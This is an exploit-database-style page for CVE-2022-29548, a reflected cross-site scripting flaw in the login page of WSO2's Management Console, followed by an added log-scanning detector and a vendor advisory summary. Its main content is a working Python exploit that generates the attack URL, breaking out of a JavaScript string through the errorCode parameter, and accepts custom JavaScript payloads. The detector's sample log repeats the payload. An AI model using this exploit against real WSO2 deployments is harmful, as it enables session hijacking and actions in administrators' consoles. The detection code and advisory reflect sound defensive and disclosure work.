WSO2 Management Console Cross Site Scripting
WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.
# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)
# Date: 21 Apr 2022
# Exploit Author: cxosmo
# Vendor Homepage: https://wso2.com
# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)
# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;
#   API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;
#   API Microgateway 2.2.0;
#   Data Analytics Server 3.2.0;
#   Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;
#   IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;
#   Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;
#   Identity Server Analytics 5.5.0 and 5.6.0;
#   WSO2 Micro Integrator 1.0.0.
# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)
# CVE: CVE-2022-29548

import argparse
import logging
import urllib.parse

# Global variables
VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="
DEFAULT_PAYLOAD = "alert(document.domain)"

# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()


def generate_payload(url, custom_payload=False):
    """Print the GET URL that reflects the (URL-encoded) payload via the errorCode parameter."""
    log.info(f"Generating payload for {url}...")
    if custom_payload:
        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")
    else:
        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")


def clean_url_input(url):
    """Reduce the target to scheme://host[:port], dropping any path the user supplied."""
    if url.count("/") > 2:
        return f"{url.split('/')[0]}//{url.split('/')[2]}"
    else:
        return url


def check_payload(payload):
    """Reject characters the page HTML-entity-encodes; otherwise return the payload URL-encoded."""
    encoded_characters = ['"', '<', '>']
    if any(character in payload for character in encoded_characters):
        log.info("Unsupported character(s) (\", <, >) found in payload.")
        return False
    else:
        return urllib.parse.quote(payload)


if __name__ == "__main__":
    # Parse command line
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
    required_arguments = parser.add_argument_group('required arguments')
    required_arguments.add_argument("-t", "--target",
                                    help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",
                                    required=True, action="store")
    parser.add_argument("-p", "--payload",
                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",
                        action="store", default=False)
    args = parser.parse_args()

    # Clean user target input
    args.target = clean_url_input(args.target.lower())

    # Check for unsupported characters in custom payload; URL-encode as required
    if args.payload:
        args.payload = check_payload(args.payload)
        if args.payload:
            generate_payload(args.target, args.payload)
    else:
        generate_payload(args.target)
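As an added, defender-side example that is not part of the advisory or of WSO2's code: a small access-log scanner that flags requests to the affected login page whose errorCode parameter is not a plain message key. Because the page entity-encodes `"`, `<` and `>`, signatures keyed on `<script>` tags miss this bug; the single quote that closes the JavaScript string literal is the indicator. The sample log lines, the message-key assumption (letters, digits, dot, underscore, hyphen) and the function names are mine.

```python
import re
import urllib.parse
from typing import Optional

# Constructed sample access-log lines in Common Log Format (not real traffic).
# Line 2 carries the break-out shape the advisory describes: %27);<js>//
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2022:10:01:12 +0000] "GET /carbon/admin/login.jsp?loginStatus=false&errorCode=login.fail HTTP/1.1" 200 5120
10.0.0.9 - - [21/Apr/2022:10:02:40 +0000] "GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1" 200 5200
10.0.0.7 - - [21/Apr/2022:10:03:05 +0000] "GET /carbon/admin/index.jsp HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
LOGIN_PAGE = "/carbon/admin/login.jsp"
# Assumption: legitimate errorCode values are message keys (letters, digits, '.', '_', '-').
SAFE_ERROR_CODE = re.compile(r"^[A-Za-z0-9._-]*$")


def error_code_values(target: str) -> list[str]:
    """Every decoded errorCode value in a request target, or [] if it is not the login page."""
    parsed = urllib.parse.urlsplit(target)
    if parsed.path != LOGIN_PAGE:
        return []
    values = []
    # Split on '&' only, so a ';' inside the value is not treated as a separator
    for pair in parsed.query.split("&"):
        key, _, raw = pair.partition("=")
        if key == "errorCode":
            values.append(urllib.parse.unquote_plus(raw))  # %27 becomes a literal quote
    return values


def suspicious_error_code(line: str) -> Optional[str]:
    """The decoded errorCode that breaks the message-key shape, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    for value in error_code_values(m.group("target")):
        if not SAFE_ERROR_CODE.match(value):
            return value
    return None


def scan(log_text: str) -> list[tuple[int, str]]:
    # (line number, decoded errorCode) for every flagged line
    return [(n, v) for n, line in enumerate(log_text.splitlines(), 1)
            if (v := suspicious_error_code(line)) is not None]


if __name__ == "__main__":
    for n, v in scan(SAMPLE_LOG):
        print(f"line {n}: errorCode={v!r}")
```

The same shape check belongs on the server side: the durable fix is to JavaScript-string-encode (or whitelist) errorCode before it is written into the page, not to rely on the HTML-entity encoding that already covers `"`, `<` and `>`.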
Related news
CVE-2022-29548: Security Advisory WSO2-2021-1603 - WSO2 Platform Security
A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.